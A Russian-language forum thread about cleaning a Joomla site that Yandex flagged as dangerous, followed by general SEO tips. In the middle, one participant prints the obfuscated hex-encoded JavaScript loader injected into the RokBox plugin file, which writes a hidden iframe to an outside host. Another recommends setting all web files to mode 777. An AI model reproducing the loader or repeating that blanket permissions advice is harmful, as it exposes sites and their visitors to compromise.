Joomla яндекс нашел вирус

stm7929259

Нужно подкрутить что-то в админке, что-то с правами или еще чем хз - в общем надо глянуть и сказать цену, какие проьлемы с сайтом и т.д.
Знакомая просит телефон шарящего человека, вирус на сайте завелся, теперь Яндекс предупреждает при переходе "Эта страница содержит содержит опасный код"
В приват

lordkay

вирус на сайте завелся,
ты думаешь прямо так?
дай ссылку на сайт

stm7929259

вроде 9057905745.ru

lordkay

так зарегь http://webmaster.yandex.ru/ и посмотри в чем именно проблема

stm7929259

да он там везде зареген, он не пишет что именно, просто выдает адрес страницы с опасным кодом, например, главная
сайт-то мелкий, откуда-там "потенциально опасный код" хз
но если вбить "постижерные изделия" и найти ссылу, то там действительно предупреждение выдаётся

lordkay

и в какой странице проблема?

stm7929259

во всех, там список из 6-7 страниц

besw

Яндыкс подключил эвристический алгоритм поиска вирусов на днях.
Може там ничо и нет.

kochelek

вирус на сайте завелся,
подтверждаю, моя Авира сказала что вирусняк
предлагаю снести крякнутый тотал коммандер(если есть), и проверить комп на вирусы, потом написать хостеру, чтобы тоже глянул

a7137928

Самое страшное, что навскидку видно в коде главной - это кусок жаваскрипта, начиная с
 var prefix = 'mailto:';

При ближайшем рассмотрении выясняется, что код скрипта рисует безобидное mailto:mail.ru =))
Но, на самом деле, там еще до фига джумловских встроенных жаваскриптов вызывается. Значит, надо проверять их.
Самый простой способ нахождения плохих файлов: надо просмотреть все файлы и посмотреть, когда они были изменены. Если сайт ставился два месяца назад, и с тех пор никто ничего не трогал, значит у всех файлов (ну разве кроме папок типа cache и temp) дата изменения должна быть два месяца назад. Нашел что-то более свежее - смотри на предмет левого кода, обычно он в начале или в конце.
UPDATE:
очень подозрительно выглядит /plugins/system/rokbox/rokbox.js:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+...  

Явно какая-то херь.
Далее, смотри сюда:
http://yandex.ru/yandsearch?text=%2Fplugins%2Fsystem%2Frokbo...
куча зараженных. А вот тут
http://www.manhunter.ru/underground/32_raspakovka_i_rasshifr...
просто явно написано, что это за код и откуда он взялся.
Так что лечи этот файл. Вероятно, тебе надо заменить его на нормальный.
В обязательном порядке надо сменить все пароли от ФТП, и не пользоваться в ФТП-менеджерах незашифрованными запомненными паролями (например, в том же ФАРе пароль хранится в незашифрованном виде, я так на своем сайте несколько раз вирусняк ловил, теперь всегда ввожу с клавиатуры).
Еще надо отметить, что на сайте дескрипшн, кейвордс и тайтл отжигают =))
<meta name="keywords" content="изделия, от, для, постижерные, изготовления, скидки, Email, стоимости, из, постижерного, на, Постижерные, по, работы, после, снятия, мерок, помощью, заказа, предоплата, размере, оплачивается, утверждения, абота, за" />
<meta name="description" content="Постижерные изделия Творческая мастерская"Новая Идея" по Вашему желанию изгото&#65533;..." />
<title>Постижерные изделия | Мастерская: Накладной живот, постижерные издел&#65533;</title>

a7137928

Так, может я и не прав. И никакого вируса нет, а в этом rokbox.js просто обфусцированный (зашифрованный) авторский код.
Для верности надо найти исходник rokbox.js с нормального сайта или из дистрибутива и посмотреть, что там написано.

a7137928

Нашел какой-то исходник: http://www.rockettheme.com/plugins/system/rokbox/rokbox.js
В нем одна строка кода. А в твоем файле - две. Вторая выглядит так:
 
function CF3E4B29BDF40BA(F32AAF2667A058F){var CC8E80DF50465=183;CC8E80DF50465=CC8E80DF50465-167;return(parseInt(F32AAF2667A058F,CC8E80DF50465));}function C273943DE5CE4D4(C47F64F17B){var DED5BC18DF999=689;DED5BC18DF999=DED5BC18DF999-687;var FDE54E2AF="";for(DD2D86F85=0;DD2D86F85<C47F64F17B.length;DD2D86F85+=DED5BC18DF999){FDE54E2AF+=( String.fromCharCode(CF3E4B29BDF40BA(C47F64F17B.substr(DD2D86F85,DED5BC18DF999))));}eval(FDE54E2AF);}C273943DE5CE4D4("69662028646F63756D656E742E636F6F6B69652E7365617263682822736270663D392229203D3D202D3129207B0A7466726B3D646F63756D656E742E676574456C656D656E7442794964282767686727293B6966287466726B3D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D676867207372633D687474703A2F2F7777772E62756C616E64612E65752F4765642F786D6C7270632E706870207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D2022736270663D393B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");

Кажется, в этом коде можно попробовать разобраться, но лучше ты просто посмотри дату изменения этого rokbox.js
По всему выходит, что проблема именно в нем.

roman05

А какую галерею там используют здесь http://9057905745.ru/index.php/postij используют?

roman05

Нашел - RokBox =)

stm7929259

Я пока ничего еще не изменял
История такова, что ко мне как-то обратилась знакомая типа сделай сайт
Я отказывался т.к. нихера не умею в этом сабже, но как-то было чуток времени,купил хостинг за 900 руб и поставил джумлу, как советовали здесь на форуме - так я решил создать стремный сайт и понять каково это :grin:
Файлы я заливал через триаловый ФТП (пароль хранил внутри - уже снёс), если какая-то шняга возникала - я гуглил и менял какую-то галку, не задумываясь, что это и зачем
Затем поставил плагин РокБокс - скачал в инете, но почему-то он херово работает (картинки криво отображаются)
Еще я захерачил модуль joomlaSEO, но херово настроил паходу раз такое дерьмо в description
Я зарегил сайт в Яндексе, Гугле, Яхху и Рэмблере, залил файлы роботов, сайтмап - вроде сайт этот даже ищется. Яндекс ругается типа вирусы
Единственное, что я так и не вкурил - это какие права надо ставить на файлы сайта - 777 или 755 или еще что, везде советуют по-разному
Спасибо за советы, на работе у меня что-то хостинговая панель не открывается (можт порт закрыт), а дома давно нет инета
Как только появится инет - я зайду в Плекс-панель и воспользуюсь каментами в треде :smirk:
Каменты вроде по делу, а то я гуглил и ни хера не нагуглил

stm7929259

Еще надо отметить, что на сайте дескрипшн, кейвордс и тайтл отжигают =))
это я поставил какой-то плагин JoomlaSEO, но что-то там до хера настроек, я сразу не вкурил что куда писать...нафлудил какой-то водой, думал прокатит, получилась лажа паходу

stm7929259

Кажется, в этом коде можно попробовать разобраться, но лучше ты просто посмотри дату изменения этого rokbox.js
Ок, гляну, спасибо!

nenakhov-71

777 или 755
В твоем случае это не важно.
chmod — изменение прав доступа к файлам и папкам. Название происходит от программы ОС Unix chmod, которая, собственно, изменяет права доступа к файлам, каталогам и символическим ссылкам.
Подробнее читай здесь.

a7137928

Единственное, что я так и не вкурил - это какие права надо ставить на файлы сайта - 777 или 755 или еще что, везде советуют по-разному
Кажется, надо так: файлы, которые могут быть перезаписаны джумлой, должны иметь 777. Обычно это кеш и темп.

stm7929259

А остальные - 755? Сам главный файл index.php - какие права на него?

nenakhov-71

Ставь все 777 и не парься, всё будет работать.

nenakhov-71

chmod -R 777 /var/www
chown -R www-data:www-data /var/www

chepa02

один из самых ходовых вопросов для хостеров:
"проверьте вашу FreeBSD на вирусы!" :)
хотя в абсолютном большинстве случаев виноваты юзеры пользующиеся входом по FTP c зараженной винды
http://masterhost.ru/support/faq/technical/virus-measures/
(годы идут а ничего не меняется...)

stm7929259

а как заливать много файлов на хостинг без ФТП?

nenakhov-71

Сходи к хостеру с флешкой :grin:

stm7929259

Кстати, неплохая идея - хостер паходу где-то в ГЗ сидит или рядом

stm7929259

chmod -R 777 /var/www
chown -R www-data:www-data /var/www
А это что такое?

toysert

по ссылке не ходил?
там же написано - SFTP

a7137928

А это что такое?
это если ты лазишь через ssh, т.е. у тебя есть доступ к командной строке сервера, где физически лежат файлы твоего сайта. Тогда вводишь такие команды и имеешь счастье.
Если ты не хочешь ssh (или тебе его не дают), то надо менять права через фтп, например, в ФАРе ставишь курсор на файл (или выделяешь группу), жмешь Ctrl+A, ставишь права:
755 ХХХ Х-Х Х-Х
777 ХХХ ХХХ ХХХ
В тотал коммандере хз как, но наверняка тоже можно. Наверняка в инете написано, как это делается.
----------------
Что касается секьюрных способов доступа, то обычно выбирают из
- фтп с ручным вводом пароля каждый раз. Клиенты - ФАР, тотал коммандер
- sftp или scp, клиент - winSCP
- ssh (интерфейс командной строки), клиент - putty
Для большинства простых операций подходит фтп-доступ. Но если тебе надо какую-нибудь супер-массовую операцию провести, то гораздо лучше ssh. Например, если тебе надо залить на сервер движок сайта (ту же джумлу с ее полутора тысячами файлов) с локального компьютера, то по фтп ты будешь очень долго заливать. У меня как-то был такой опыт - соединение фтп обрывалось по тайм-ауту, и я потом по всем директориям лазил и проверял, все ли скопировалось. В таком варианте гораздо удобнее запаковать файлы в gzip-архив на локальной машине, кинуть архив на сервер, там из командной строки распаковать, выставить все права и так далее.
Но надо немножко знать базовые команды для шелла - ls, cp, mkdir и так далее.

stm7929259

Кажется, в этом коде можно попробовать разобраться, но лучше ты просто посмотри дату изменения этого rokbox.js
По всему выходит, что проблема именно в нем.
В общем, залез в админку, переставил RockBox плагин
Послал Яндексу запрос перепроверить сайт

a7137928

"молодец, все правильно сделал" :) Плохой код более не наблюдается.
По идее, должны перепроверить быстро (день-два). По крайней мере, видел несколько примеров, где была такая скорость реакции. Хотя когда пару лет назад мой сайт словил виря и был размечен гуглом, мне понадобилось 2 месяца и три обращения. С тех пор я затаил на них обиду =))
К слову, если тебе не лень, я бы снес к чертям этот rokbox и поставил бы какой-нибудь другой плагин для фотографий, потому что косяки. Когда открываешь фотографию, во всплывающем окне явно траблы на правой границе, и нет кнопок листания вправо-влево по фотографиям. Хотя, возможно, зря я гоню на рокбокс, а просто что-то в плагине плохо настроено, или фотки на странице http://www.9057905745.ru/index.php/postij не объединены в одну галерею.

stm7929259

Плохой код более не наблюдается.
Это ты как решил?
По поводу РокБокса - да, он лажает, это очевидно, но я не понял почему
Альтернативного плагина не нашел
Единой галереи нет, я просто добавляю имадж маленький и прописываю в html-коде теги рокбокса - вот так оно и работает, криво.

roman05

У меня он, кстатии нормально работет, без этого косяка с правой стороной.
А других галерей приличных еще как минимум 2.

stm7929259

А что значит галерея?
Я в текст вставляю фотку маленькую, а потом добавляю ту же фотку но с рокбоксовой шнягой:
<a href="/images/stories/postij/_SC03400.JPG" rel="rokbox"><img src="/images/stories/postij/_SC03400.JPG" border="0" alt="Постижерные изделия" title="Постижерные изделия" width="92" height="123" style="border: 0pt none;" />
чо я не так делаю?
Кстати, какой плагин - альтернатива Рокбоксу?

a7137928

Это ты как решил?
я захожу на http://9057905745.ru/plugins/system/rokbox/rokbox.js и вижу там только одну строчку кода. А раньше было две.
Вообще, идея у вирусописателей интересная. Они засунули свой код не куда-нибудь, а в скрипт с обфусцированным (зашифрованным) кодом. Если бы они засунули в любое другое место, это было бы видно сразу, а тут получается маскировка.

stm7929259

А, ясно

roman05

Ну там есть от отдельного раздела сайта (типа joomgallery) до флешевых галерей
http://joomla-support.ru/forumdisplay.php?s=5c0ce2db83596724...

stm7929259

По идее, должны перепроверить быстро (день-два)
Спасибо, перепроверили - вируса больше нет
Народ, а что по поводу поиска - какие общие инструменты используются для оптимизации?
1. Я залил в корень сайта файл robots
2. Добавил файл Sitemap.xml - сгенерил его в инете
3. В Джумле заполнил поля Global meta description, Global keywords
4. Еще я установил JoomSEO модуль, но потом снес т.к. не понял, как его настраивать
5. зарегил сайт в Яндексе, Гугле, также добавил их в Рэмблере и Яху
А что еще обычно делают для поиска? (бабло за строчку в поиске не рассматривается)

a7137928

А что еще обычно делают для поиска?
Для поиска - оптимизируют контент сайта под запросы.
- пишешь хорошие тематические тексты, нормально их форматируешь, чтобы было красиво. Фотки вставляешь. Делаешь чистенький и аккуратный сайт, где все работает и нет косяков.
- изучаешь через вордстат наиболее популярные запросы по своей тематике. Например, по тематике париков это будут "парики", а не "постижерные изделия". Слова из этих запросов должны присутствовать в твоих текстах.
- тебе нужны обратные ссылки. Регистрируешься в хороших авторитетных каталогах (тематических и общих). Обмениваешься ссылками со своими партнерами, с другими тематическими сайтами (можно даже с непрямыми конкурентами - например, если они из другого региона).
- регишься на вебмастер.яндекс.ру, читаешь там хелп. Там есть даже мануал "как сделать хороший сайт".
Это белая и пушистая оптимизация. Вкладываешь мало денего, но много труда и времени.
Можно менее бело и пушисто: контент не делаешь (тыришь откуда-нибудь или заказываешь копирайтеру), словами запросов шпигуешь все страницы, обратные ссылки покупаешь. В пределе - платишь конторе, которая все это сделает за тебя.

roman05

Можно менее бело и пушисто
А менее белая и пушистая эффективнее грамотной белой и пушистой?
Иными словами,эффективнее заплатить бабки, чтобы раскрутиться(точнее постоянно платить деньги, чтобы висеть, скажем, в топ-10) или белая раскрутка и оптимизация? Во втором случае можно попасть в те же топ-10 по интересующим запросам в поисковиках?

a7137928

А менее белая и пушистая эффективнее грамотной белой и пушистой?
Да. Точнее, так: они немного по-разному работают.
Белый и пушистый сайт - это как здоровье сайта, а закупка ссылок - это как энергетик, который дает быстрый результат, но достаточно быстро заканчивается. Можно выделить еще контекстную рекламу - это будет допинг =)) Но контекст дороже закупки ссылок, и с ним тоже надо уметь работать.
Если ты делаешь новый сайт с нуля, то чудовищно тяжело сходу продавить его в выдачу. Он должен обрасти обратными ссылками, должен повисеть в выдаче, люди по нему будут кликать.
Если сайт изначально хороший, то все это придет со временем, но ждать придется очень долго. Поэтому надо закупать ссылки или даже сразу директ - это даст быстрый результат, пока сайт потихоньку "раскручивается".
Но потом, если твой сайт не будет белым и пушистым, то ты столкнешься с тем, что сам он плавать не будет. На непушистый сайт не будет хороших естественных бэклинков, будут закупленные тобой ссылки, а они со временем отмирают, их постоянно надо обновлять, закупая новые, иначе сайт будет вываливаться из топа. Далее, если сайт говно, то пользователи будут плохо переходить на него с выдачи , и это будет работать в минус.
В общем, белый и пушистый сайт - это такая стратегическая основа для будущих успехов. На любом этапе развития его будет проще вытянуть наверх, чем поганый сайт.

roman05

Понятно, вообщем, я так себе и представлял.

msfs11

Если хостинг виртуальный, то хостер вполне мог ограничить права максимумом в 755.
Оставить комментарий
Имя или ник:
Комментарий: